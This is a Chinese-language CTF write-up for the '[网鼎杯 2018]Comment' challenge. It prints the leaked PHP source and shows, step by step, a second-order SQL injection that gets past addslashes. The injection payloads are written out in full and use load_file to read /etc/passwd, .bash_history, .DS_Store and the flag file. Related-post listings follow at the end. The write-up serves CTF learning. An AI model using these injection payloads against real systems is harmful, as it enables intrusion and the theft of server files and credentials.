1、打开之后只有一个留言页面,很自然的就想到了二次注入得问题,顺带查看了下源代码信息,并没有什么提示,显示界面如下:

2、那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户、密码给出了部分提示,但是最后三位密码需要爆破,结果如下:

3、扫描到了.git文件,那就使用githack尝试获取下源码信息,但是显示得源码信息不全,需要恢复,(这里在网上找了下,一直恢复不成功,后面再看),结果如下:

githack下载下来的:

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

    header("Location: ./login.php");

    die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

    break;

case 'comment':

    break;

default:

    header("Location: ./index.php");

}

}

else{

    header("Location: ./index.php");

}

?>

完整得源码:

<?php

include "mysql.php";

session_start();

if($_SESSION['login'] != 'yes'){

    header("Location: ./login.php");

    die();

}

if(isset($_GET['do'])){

switch ($_GET['do'])

{

case 'write':

    $category = addslashes($_POST['category']);

    $title = addslashes($_POST['title']);

    $content = addslashes($_POST['content']);

    $sql = "insert into board

            set category = '$category',

                title = '$title',

                content = '$content'";

    $result = mysql_query($sql);

    header("Location: ./index.php");

    break;

case 'comment':

    $bo_id = addslashes($_POST['bo_id']);

    $sql = "select category from board where id='$bo_id'";

    $result = mysql_query($sql);

    $num = mysql_num_rows($result);

    if($num>0){

    $category = mysql_fetch_array($result)['category'];

    $content = addslashes($_POST['content']);

    $sql = "insert into comment

            set category = '$category',

                content = '$content',

                bo_id = '$bo_id'";

    $result = mysql_query($sql);

    }

    header("Location: ./comment.php?id=$bo_id");

    break;

default:

    header("Location: ./index.php");

}

}

else{

    header("Location: ./index.php");

}

?>

4、先随便进行一个发帖,然后提交留言,回显了我们的留言信息,那也就确定了二次注入的回显数据的地方,结果如下:

5、对获得的源代码进行分析,服务端在接受到我们的数据之后进行了转义处理(addslashes),但是数据在存到数据库中时还是存储的我们提交的数据,变化过程:'->\'->',结合代码:

$sql = "insert into board

            set category = '$category',  //category参数可控

                title = '$title',

                content = '$content'";   

$sql = "select category from board where id='$bo_id'";   //直接取用我们可以控制的category参数

$sql = "insert into comment

            set category = '$category',

                content = '$content',

                bo_id = '$bo_id'";

//content参数可控并且会展示其内容,调用了我们可控的category参数,所以这条sql语句中就有两个地方我们可以直接控制

我们留言的内容在(content):

所以我们就需要把我们想看到的信息写入到content中,使其进行展示,加入我们想要获取database()的信息,那我们就应该形成:

$sql = "insert into comment

            set category = '$category',

                content = database(),

                bo_id = '$bo_id'";

这里很明显content参数的单引号去掉了,但是content参数有进行转义,所以导致这一情况的只能是category参数,这里想到了之前做过的一道题:https://www.cnblogs.com/upfine/p/16545379.html,通过转义符使&passwd=成为了搜索的用户名内容(见下图),那这里我们也可以采用这种方式,因此构造我们的category的payload:\,我们的content的payload:,content=database(),#。结果如下:

6、在网上看到了另外一种方式,就是采用/**/来注释掉原来的content内容,其实两种方式原理差不多,一个是采用/**/注释掉content部分的内容,一个是采用\转移单引号,使content内容成为了category的写入内容(这里写入的是comment表,所以并不会影响原来从board获取的category值,写入之后语句中的category还是\,可以看上面图,在一个发帖中同时获取了user和database),网上category的payload:',content=database(),/*,content的payload:*/#。结果如下:

7、然后就进获取表、列,具体的信息等,但是并没有获取flag,那就应该是存放在系统上的一个文件里了,读取下/etc/passwd,这里不要使用\转义,因为payload中存在单引号,使用这种方式时,导致payload语句中的单引号被转移,而无法执行;

所以这里我们就只能使用/**/注释掉content内容的方式了,category的payload:',content=(select(load_file('/etc/passwd'))),/*,content的payload:*/#,读取的/etc/passwd信息如下:

8、www用户的目录是/home/www,读取一下.bash_history文件,查看下用户使用的命令,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,发现了.DS_Store文件,结果如下:

.bash_history文件:

9、那就读取下.DS_Store文件,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,结果如下(应该是没有读完):

10、那就使用hex编码读取一下,category的payload:',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*,content的payload:*/#,结果如下:

返回内容如下:

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

进行16进制转换(https://www.toolscat.com/decode/hex),结果如下:

最终成功得到flag文件:flag_8946e1ff1ee3e40f.php。

11、读取下flag文件,category的payload:',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*,content的payload:*/#,结果如下:

返回信息如下:

3C3F7068700A0924666C61673D22666C61677B64363335303431392D326336372D343261392D386664352D3538663932653334363631647D223B0A3F3E0A

进行16进制转码,最终成功得到flag:flag{d6350419-2c67-42a9-8fd5-58f92e34661d},结果如下:

[网鼎杯 2018]Comment-1|SQL注入|二次注入的更多相关文章

  1. [网鼎杯 2018]Comment

    [网鼎杯 2018]Comment 又遇到了一道有意思的题目,还是比较综合的,考的跟之前有一道很相像,用的还是二次注入. 因为找不到登陆点的sql注入,所以扫了一下源码,发现是存在git泄露的. [2 ...

  2. [网鼎杯2018]Unfinish-1|SQL注入|二次注入

    1.进入题目之后只有一个登录界面,检查源代码信息并没有发现有用的信息,尝试万能密码登录也不行,结果如下: 2.进行目录扫描,发现了注册界面:register.php,结果如下: 3.那就访问注册界面, ...

  3. [原题复现+审计][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)

    简介  原题复现:  考察知识点:SSRF.反序列化.SQL注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过 ...

  4. 【网鼎杯2018】fakebook

    解题过程: 首先进行目录扫描,发现以下目录: user.php.bak login.php flag.php user.php robots.txt user.php.bak猜测存在源码泄露. 查看源 ...

  5. 刷题 [网鼎杯 2018]Fakebook

    解题思路 首先登陆页面发现是这样的: 查看源码 源码很正常,也没有什么特别的 web目录扫描 我用的是dirmap工具扫描,扫描结果保存在一个txt文件中,结果可知没什么后台. robots.txt ...

  6. 刷题记录:[网鼎杯]Fakebook

    目录 刷题记录:[网鼎杯]Fakebook 一.涉及知识点 1.敏感文件泄露 2.sql注入 二.解题方法 刷题记录:[网鼎杯]Fakebook 题目复现链接:https://buuoj.cn/cha ...

  7. CTF-i春秋网鼎杯第四场部分writeup

    CTF-i春秋网鼎杯第四场部分writeup 因为我们组的比赛是在第四场,所以前两次都是群里扔过来几道题然后做,也不知道什么原因第三场的题目没人发,所以就没做,昨天打了第四场,简直是被虐着打. she ...

  8. CTF-i春秋网鼎杯第二场misc部分writeup

    CTF-i春秋网鼎杯第二场misc部分writeup 套娃 下载下来是六张图片 直接看并没有什么信息 一个一个查看属性 没有找到有用信息 到winhexv里看一下 都是标准的png图片,而且没有fla ...

  9. CTF-i春秋网鼎杯第一场misc部分writeup

    CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...

随机推荐

  1. nginx https证书配置

    1. Nginx配置 server { listen 443; #指定ssl监听端口 server_name www.example.com; ssl on; #开启ssl支持 ssl_certifi ...

  2. JS:对象调方法1

    找调用者 1.如果有this,就先看this在哪个函数中,就是离this最近的function,没有就是window 2.找到函数后,辨别哪个是调用者 例1: 点击查看代码 function fn() ...

  3. 关于vue项目中搜索节流的实现

    我们经常会遇到这种需求,现在我们在使用百度搜索的时候他们的思想也是根据防抖节流而实现的,至于用防抖还是节流根据自己需求. <template> <input type="t ...

  4. 高级web网页人脸识别tracking.js

    what?你没有看错,强大的JavaScript也可以实现人脸识别功能.小编精心整理了一个人脸识别的JavaScript库(tracking.js),通过这篇文章,你可以了解到如何在网页中实现一个人脸 ...

  5. Vue回炉重造之搭建考试答卷系统

    本篇章主要讲述系统搭建逻辑,有疑问的可以加微信联系我.考试系统 资源 Vue.js Element UI 第三方数据接口 业务 答题过程中,防止用户中途退出或者其他不可抗力因素阻碍答题,在每次选择都要 ...

  6. 《Java编程思想》学习笔记_多态

    多态 多态指一个行为产生多种状态,针对父类类型可接收其子类类型,最终执行的状态由具体子类确定,其不同子类可呈现出不同状态.例如人[父类]都会跑步[行为],但小孩[子类]跑步.成年人[子类]跑步.运动员 ...

  7. 【python基础】第08回 流程控制 for循环

    本章内容概要 1.循环结构之 for 循环 本章内容详解 1.循环结构之for循环 1.1 语法结构 for 变量名 in 可迭代对象: #字符串 列表 字典 元组 for 循环的循环体代码 针对变量 ...

  8. NC16660 [NOIP2004]FBI树

    NC16660 [NOIP2004]FBI树 题目 题目描述 我们可以把由"0"和"1"组成的字符串分为三类:全"0"串称为B串,全&quo ...

  9. 面向个性化需求的在线云数据库混合调优系统 | SIGMOD 2022入选论文解读

    SIGMOD 数据管理国际会议是数据库领域具有最高学术地位的国际性会议,位列数据库方向顶级会议之首.近日,腾讯云数据库团队的最新研究成果入选 SIGMOD 2022 Research Full Pap ...

  10. java反序列化漏洞专项

    背景条件:java的框架,java的应用程序,使用序列化,反序列化操作非常多.在漏洞挖掘中,代码审计中,安全研究中,反序列化漏洞是个重点项,不可忽视.尤其是java应用程序的rce,10个里面有7个是 ...